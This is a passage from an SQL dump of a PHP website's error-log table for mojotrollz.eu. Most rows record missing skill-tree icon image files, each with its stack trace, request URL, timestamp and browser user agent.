/home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_fireball02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 61, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (654, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_fire.png\' found.', '12d094ce43b9e0fb780338ebfba40b4f837ca408', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_fire...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_fire...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_fire_fire.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 100, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (655, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_soulburn.png\' found.', '8358a2ec109cd9caf8590e16aa009d628ff6f239', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_soul...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_soul...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_soulburn.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 68, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (656, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_firearmor.png\' found.', '2e89c3af04467e26a35db387ab98c001108b3f2d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_fire...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_fire...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_firearmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 55, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (657, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_masterofelements.png\' found.', 'f49cb2820f18f2358f0d2b0e419413d4469b8e64', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_mast...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_mast...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_masterofelements.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 53, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (658, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_exorcism_02.png\' found.', '098b8fc474b313bbc5bd69bdb09f5eb76e3d8087', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_exor...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_exor...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 02:41:35', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_exorcism_02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (659, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_excorcism02.png\' found.', '7855c304b6f714a885b00edb809cf8ac4bf60183', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_exco...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_exco...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 02:41:52', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_excorcism02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (660, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_excorcism_02.png\' found.', '1962396b62dae36ad6dbdab77054de4eba58fce6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_exco...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_exco...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_excorcism_02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 45, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (661, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_frostbolt02.png\' found.', 'b3582917cbbb629607e7d4377cc5be7f4a2763cd', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_fro...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_fro...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_frostbolt02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 37, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (662, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_ice_magic.png\' found.', '75f095a6eecb22b72ac8063cf2b0d37a3bbbc8ab', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_ice_magic...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_ice_magic...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.048, '2014-12-14 02:43:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_ice_magic.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (663, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_ice_magicdamage.png\' found.', '6963cda1ad533e4b9c8392cff30291857f8b085c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_ice_magic...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_ice_magic...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_ice_magicdamage.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 33, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (664, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_iceshard.png\' found.', 'a423a9a08b7bd9456ac9119e02a89acc405a55b5', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_ice...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_ice...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_frost_iceshard.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 30, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (665, 'ERROR', 'Could not insert Value.', '4d19e16da56d4117438baf4cdc4c8d2b473a8443', 1, '/home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php', 13, '#0 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags_action_value_add(\'1\', \'489\', \'Warsong Gulch\', \'\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 02:57:01', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=value_add&id=489&type=1&value=Warsong%20Gulch&description=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=7_000000000000000_0000000000000000_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 OPR/25.0.1614.63 (Edition FCD)', 14, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (666, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_frostarmor.png\' found.', '0e595bae23d80b6b4a561041fe29543bec4f50ed', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_fro...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_fro...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_frostarmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 28, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (667, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_freezingbreath.png\' found.', '972302e6d2be50047b42f8442de6cd0423dde6e3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_fre...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_fre...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_freezingbreath.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 27, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (668, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_wisp.png\' found.', '44e5caf64d6e61a51000a9009479b32065ca4129', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_wis...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_wis...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_wisp.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 25, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (669, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_frostbolt.png\' found.', '85d3f6dcc9d07c1f0a0455143129705992bcf7d1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_fro...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_fro...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.076, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_frostbolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 23, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (670, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_icestorm.png\' found.', '339b3973d5558e4496b02feee3777e6649c3df9d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_ice...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_ice...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_icestorm.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 19, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (671, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_darkritual.png\' found.', '97d265ef13089793e171b7811ad37431bbeb44f6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_da...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_da...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_darkritual.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 116, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (672, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_frostshock.png\' found.', '32f6c54ee7b7a7ebec4db73674f3184eb6818acf', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_fro...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_fro...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_frostshock.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 13, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (673, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_frost.png\' found.', 'e3563400d25ffc3decb64abdeb5096926e03beec', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_fro...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_fro...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:50:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_frost.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 13, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, 